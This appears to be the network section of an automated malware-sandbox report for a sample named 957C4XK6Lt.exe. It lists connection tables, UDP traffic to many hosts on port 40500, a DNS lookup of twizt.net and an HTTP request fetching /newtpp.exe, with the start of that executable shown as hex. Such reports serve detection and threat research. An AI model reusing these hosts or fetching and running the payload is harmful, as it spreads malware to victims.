                                                                        Apr 24, 2024 10:10:04.486512899 CEST4976340500192.168.2.6156.212.34.122
                                                                        Apr 24, 2024 10:10:04.674060106 CEST4976580192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:05.014422894 CEST8049765193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:05.580272913 CEST4976580192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:05.920032024 CEST8049765193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:06.486546993 CEST4976580192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:06.826278925 CEST8049765193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:07.404792070 CEST4976580192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:07.745471954 CEST8049765193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:09.771106958 CEST4976680192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:10.112664938 CEST8049766193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:10.628104925 CEST4976680192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:10.969331980 CEST8049766193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:11.517781973 CEST4976680192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:11.861337900 CEST8049766193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:12.361593008 CEST4976680192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:12.486675978 CEST4976340500192.168.2.6156.212.34.122
                                                                        Apr 24, 2024 10:10:12.703105927 CEST8049766193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:13.205271959 CEST4976680192.168.2.6193.233.132.177
                                                                        Apr 24, 2024 10:10:13.546413898 CEST8049766193.233.132.177192.168.2.6
                                                                        Apr 24, 2024 10:10:16.707855940 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:16.708187103 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.043225050 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.043366909 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.043627977 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378523111 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378603935 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378669024 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378703117 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378746986 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378834963 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378881931 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378910065 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378927946 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378948927 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378951073 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378966093 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.378984928 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.378989935 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379025936 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379475117 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379492998 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379548073 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.379597902 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379601002 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.379618883 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.379642963 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.379652977 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.533427954 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714423895 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714449883 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714509010 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714541912 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714585066 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714595079 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714644909 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714662075 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714679956 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714708090 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714714050 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714718103 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714730978 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714756012 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714765072 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.714915991 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.714968920 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.715311050 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.715329885 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.715348959 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.715358973 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.715370893 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.715373039 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.715385914 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.715388060 CEST8049767185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:17.715415001 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:17.715429068 CEST4976780192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:19.189690113 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:19.410936117 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:19.746680975 CEST8049768185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:19.749922037 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:19.750055075 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:20.087341070 CEST8049768185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:20.087399960 CEST8049768185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:20.087511063 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.117149115 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.117795944 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.452142000 CEST8049768185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:22.452229977 CEST4976880192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.452655077 CEST8049769185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:22.452721119 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.452941895 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.486531019 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:22.788069010 CEST8049769185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:22.788122892 CEST8049769185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:22.788192034 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:23.502918959 CEST4977040500192.168.2.684.53.244.106
                                                                        Apr 24, 2024 10:10:23.877953053 CEST405004977084.53.244.106192.168.2.6
                                                                        Apr 24, 2024 10:10:24.392793894 CEST4977040500192.168.2.684.53.244.106
                                                                        Apr 24, 2024 10:10:24.816878080 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:24.817173958 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:25.150667906 CEST8049771185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:25.150751114 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:25.150958061 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:25.152224064 CEST8049769185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:25.152271032 CEST4976980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:25.485827923 CEST8049771185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:25.485863924 CEST8049771185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:25.485954046 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:26.408399105 CEST4977040500192.168.2.684.53.244.106
                                                                        Apr 24, 2024 10:10:26.783698082 CEST405004977084.53.244.106192.168.2.6
                                                                        Apr 24, 2024 10:10:27.299015045 CEST4977040500192.168.2.684.53.244.106
                                                                        Apr 24, 2024 10:10:27.504146099 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:27.504456997 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:27.673505068 CEST405004977084.53.244.106192.168.2.6
                                                                        Apr 24, 2024 10:10:27.838507891 CEST8049771185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:27.838721037 CEST4977180192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:27.839391947 CEST8049772185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:27.839508057 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:27.839699984 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:28.174103975 CEST4977040500192.168.2.684.53.244.106
                                                                        Apr 24, 2024 10:10:28.176989079 CEST8049772185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:28.177259922 CEST8049772185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:28.177345037 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:28.545900106 CEST405004977084.53.244.106192.168.2.6
                                                                        Apr 24, 2024 10:10:29.064671040 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.206696033 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.206990004 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.541706085 CEST8049772185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:30.541922092 CEST8049773185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:30.542040110 CEST4977280192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.542076111 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.542294025 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:30.878544092 CEST8049773185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:30.878624916 CEST8049773185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:30.878695011 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:33.535463095 CEST4977440500192.168.2.6195.158.15.3
                                                                        Apr 24, 2024 10:10:33.926285028 CEST4977680192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:33.933918953 CEST4050049774195.158.15.3192.168.2.6
                                                                        Apr 24, 2024 10:10:34.278112888 CEST804977691.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:34.439646959 CEST4977440500192.168.2.6195.158.15.3
                                                                        Apr 24, 2024 10:10:34.783411980 CEST4977680192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:34.838155985 CEST4050049774195.158.15.3192.168.2.6
                                                                        Apr 24, 2024 10:10:35.129348040 CEST804977691.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:35.345901966 CEST4977440500192.168.2.6195.158.15.3
                                                                        Apr 24, 2024 10:10:35.642813921 CEST4977680192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:35.744401932 CEST4050049774195.158.15.3192.168.2.6
                                                                        Apr 24, 2024 10:10:36.252156973 CEST4977440500192.168.2.6195.158.15.3
                                                                        Apr 24, 2024 10:10:36.650219917 CEST4050049774195.158.15.3192.168.2.6
                                                                        Apr 24, 2024 10:10:37.158526897 CEST4977440500192.168.2.6195.158.15.3
                                                                        Apr 24, 2024 10:10:37.557028055 CEST4050049774195.158.15.3192.168.2.6
                                                                        Apr 24, 2024 10:10:39.642795086 CEST4977680192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:39.990310907 CEST804977691.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:40.533456087 CEST4977680192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:40.879901886 CEST804977691.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:42.345909119 CEST4974980192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:42.910356998 CEST4977780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:43.159167051 CEST4977840500192.168.2.6109.122.77.179
                                                                        Apr 24, 2024 10:10:43.256969929 CEST804977791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:43.846036911 CEST4977780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:44.174045086 CEST4977840500192.168.2.6109.122.77.179
                                                                        Apr 24, 2024 10:10:44.193933964 CEST804977791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:44.845930099 CEST4977780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:45.192451954 CEST804977791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:45.845954895 CEST4977780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:46.174226999 CEST4977840500192.168.2.6109.122.77.179
                                                                        Apr 24, 2024 10:10:46.193201065 CEST804977791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:46.846034050 CEST4977780192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:47.195589066 CEST804977791.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:49.223006010 CEST4977980192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:49.567223072 CEST804977991.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:50.049186945 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:50.080322027 CEST4977980192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:50.189687967 CEST4977840500192.168.2.6109.122.77.179
                                                                        Apr 24, 2024 10:10:50.386639118 CEST8049773185.215.113.66192.168.2.6
                                                                        Apr 24, 2024 10:10:50.387543917 CEST4977380192.168.2.6185.215.113.66
                                                                        Apr 24, 2024 10:10:50.424652100 CEST804977991.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:50.939701080 CEST4977980192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:51.289083958 CEST804977991.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:51.799065113 CEST4977980192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:52.143672943 CEST804977991.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:52.658446074 CEST4977980192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:53.003705978 CEST804977991.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:55.640635967 CEST4978080192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:55.987492085 CEST804978091.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:56.611543894 CEST4978080192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:56.959120035 CEST804978091.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:57.611587048 CEST4978080192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:10:57.960896969 CEST804978091.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:10:58.205302000 CEST4977840500192.168.2.6109.122.77.179
                                                                        Apr 24, 2024 10:10:59.754123926 CEST4978180192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:11:00.096895933 CEST804978191.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:11:00.689667940 CEST4978180192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:11:01.034040928 CEST804978191.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:11:01.705288887 CEST4978180192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:11:02.047472954 CEST804978191.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:11:02.564646006 CEST4978180192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:11:02.906980991 CEST804978191.202.233.141192.168.2.6
                                                                        Apr 24, 2024 10:11:03.408396006 CEST4978180192.168.2.691.202.233.141
                                                                        Apr 24, 2024 10:11:03.750925064 CEST804978191.202.233.141192.168.2.6
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 24, 2024 10:06:57.287872076 CEST5993653192.168.2.61.1.1.1
                                                                        Apr 24, 2024 10:06:57.460658073 CEST53599361.1.1.1192.168.2.6
                                                                        Apr 24, 2024 10:07:11.867132902 CEST5914140500192.168.2.6120.237.99.181
                                                                        Apr 24, 2024 10:07:16.864430904 CEST5914140500192.168.2.685.113.19.18
                                                                        Apr 24, 2024 10:07:21.863770962 CEST5914140500192.168.2.65.200.152.6
                                                                        Apr 24, 2024 10:07:26.909948111 CEST5914140500192.168.2.682.114.186.50
                                                                        Apr 24, 2024 10:07:31.911741972 CEST5914140500192.168.2.695.71.69.217
                                                                        Apr 24, 2024 10:07:36.933234930 CEST5914140500192.168.2.695.107.12.43
                                                                        Apr 24, 2024 10:07:41.942141056 CEST5914140500192.168.2.636.20.68.95
                                                                        Apr 24, 2024 10:07:46.957751989 CEST5914140500192.168.2.62.180.157.70
                                                                        Apr 24, 2024 10:07:51.958250046 CEST5914140500192.168.2.6186.94.185.219
                                                                        Apr 24, 2024 10:07:56.957866907 CEST5914140500192.168.2.6197.148.34.173
                                                                        Apr 24, 2024 10:08:01.978212118 CEST5914140500192.168.2.65.200.190.214
                                                                        Apr 24, 2024 10:08:06.972796917 CEST5914140500192.168.2.65.63.93.62
                                                                        Apr 24, 2024 10:08:11.988207102 CEST5914140500192.168.2.639.53.75.107
                                                                        Apr 24, 2024 10:08:16.989022970 CEST5914140500192.168.2.689.218.235.182
                                                                        Apr 24, 2024 10:08:22.004023075 CEST5914140500192.168.2.695.58.18.206
                                                                        Apr 24, 2024 10:08:27.019325972 CEST5914140500192.168.2.631.186.54.5
                                                                        Apr 24, 2024 10:08:32.035368919 CEST5914140500192.168.2.6217.20.222.188
                                                                        Apr 24, 2024 10:08:38.234849930 CEST5914140500192.168.2.6134.35.185.171
                                                                        Apr 24, 2024 10:08:43.222645044 CEST5914140500192.168.2.691.234.219.185
                                                                        Apr 24, 2024 10:08:48.239816904 CEST5914140500192.168.2.641.102.227.47
                                                                        Apr 24, 2024 10:08:53.254441977 CEST5914140500192.168.2.6134.35.74.170
                                                                        Apr 24, 2024 10:08:58.253866911 CEST5914140500192.168.2.62.185.146.181
                                                                        Apr 24, 2024 10:09:03.253978014 CEST5914140500192.168.2.682.194.11.2
                                                                        Apr 24, 2024 10:09:08.269597054 CEST5914140500192.168.2.695.156.103.50
                                                                        Apr 24, 2024 10:09:13.269540071 CEST5914140500192.168.2.637.20.161.137
                                                                        Apr 24, 2024 10:09:18.287283897 CEST5914140500192.168.2.6151.233.73.168
                                                                        Apr 24, 2024 10:09:23.285104990 CEST5914140500192.168.2.689.219.115.32
                                                                        Apr 24, 2024 10:09:28.285043955 CEST5914140500192.168.2.6128.65.176.18
                                                                        Apr 24, 2024 10:09:33.285933018 CEST5914140500192.168.2.6212.112.112.84
                                                                        Apr 24, 2024 10:09:38.336082935 CEST5914140500192.168.2.6185.177.0.227
                                                                        Apr 24, 2024 10:09:43.348638058 CEST5914140500192.168.2.692.47.124.54
                                                                        Apr 24, 2024 10:09:48.347692013 CEST5914140500192.168.2.6181.114.188.143
                                                                        Apr 24, 2024 10:09:53.363436937 CEST5914140500192.168.2.689.236.226.70
                                                                        Apr 24, 2024 10:09:58.363224983 CEST5914140500192.168.2.646.35.86.48
                                                                        Apr 24, 2024 10:10:03.378900051 CEST5914140500192.168.2.62.190.224.61
                                                                        Apr 24, 2024 10:10:08.378882885 CEST5914140500192.168.2.6105.109.202.176
                                                                        Apr 24, 2024 10:10:13.394594908 CEST5914140500192.168.2.692.46.174.254
                                                                        Apr 24, 2024 10:10:18.414505959 CEST5914140500192.168.2.631.186.49.163
                                                                        Apr 24, 2024 10:10:23.425986052 CEST5914140500192.168.2.65.251.56.144
                                                                        Apr 24, 2024 10:10:28.442260027 CEST5914140500192.168.2.6134.35.173.140
                                                                        Apr 24, 2024 10:10:33.442451000 CEST5914140500192.168.2.65.233.222.244
                                                                        Apr 24, 2024 10:10:38.457098961 CEST5914140500192.168.2.6151.233.21.215
                                                                        Apr 24, 2024 10:10:43.459613085 CEST5914140500192.168.2.6134.35.81.188
                                                                        Apr 24, 2024 10:10:48.476371050 CEST5914140500192.168.2.62.191.221.216
                                                                        Apr 24, 2024 10:10:53.507363081 CEST5914140500192.168.2.6189.158.148.85
                                                                        Apr 24, 2024 10:10:58.504112005 CEST5914140500192.168.2.6134.35.163.241
                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Apr 24, 2024 10:08:38.664313078 CEST134.35.185.171192.168.2.6ffb7(Port unreachable)Destination Unreachable
                                                                        Apr 24, 2024 10:08:48.547014952 CEST41.102.227.47192.168.2.6cc7e(Port unreachable)Destination Unreachable
                                                                        Apr 24, 2024 10:09:28.720215082 CEST128.65.176.18192.168.2.6f03c(Port unreachable)Destination Unreachable
                                                                        Apr 24, 2024 10:09:58.804265976 CEST46.35.86.48192.168.2.6443c(Port unreachable)Destination Unreachable
                                                                        Apr 24, 2024 10:10:08.696899891 CEST105.109.202.176192.168.2.6f406(Port unreachable)Destination Unreachable
                                                                        Apr 24, 2024 10:10:58.943845987 CEST134.35.163.241192.168.2.6e9fd(Port unreachable)Destination Unreachable
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Apr 24, 2024 10:06:57.287872076 CEST192.168.2.61.1.1.10xa224Standard query (0)twizt.netA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Apr 24, 2024 10:06:57.460658073 CEST1.1.1.1192.168.2.60xa224No error (0)twizt.net185.215.113.66A (IP address)IN (0x0001)false
                                                                        • twizt.net
                                                                        • 185.215.113.66
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649710185.215.113.66803748C:\Users\user\Desktop\957C4XK6Lt.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 24, 2024 10:06:57.806061029 CEST174OUTGET /newtpp.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                        Host: twizt.net
                                                                        Apr 24, 2024 10:06:58.146378994 CEST1289INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Wed, 24 Apr 2024 08:06:57 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 86016
                                                                        Last-Modified: Tue, 23 Apr 2024 21:19:33 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "662825e5-15000"
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d ab 71 6a 29 ca 1f 39 29 ca 1f 39 29 ca 1f 39 20 b2 95 39 2e ca 1f 39 51 b8 1e 38 2b ca 1f 39 ea c5 42 39 2b ca 1f 39 ea c5 40 39 28 ca 1f 39 ea c5 10 39 2b ca 1f 39 0e 0c 72 39 2d ca 1f 39 29 ca 1e 39 e9 ca 1f 39 0e 0c 64 39 3c ca 1f 39 20 b2 9c 39 2d ca 1f 39 20 b2 9b 39 35 ca 1f 39 20 b2 8e 39 28 ca 1f 39 52 69 63 68 29 ca 1f 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 25 28 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 78 00 00 00 00 00 00 d0 74 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 27 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 37 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 00 00 00 40 01 00 00 2e 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mqj)9)9)9 9.9Q8+9B9+9@9(99+9r9-9)99d9<9 9-9 959 9(9Rich)9PEL%(fxt@' .textZ `.rdata78@@.data@?@."@
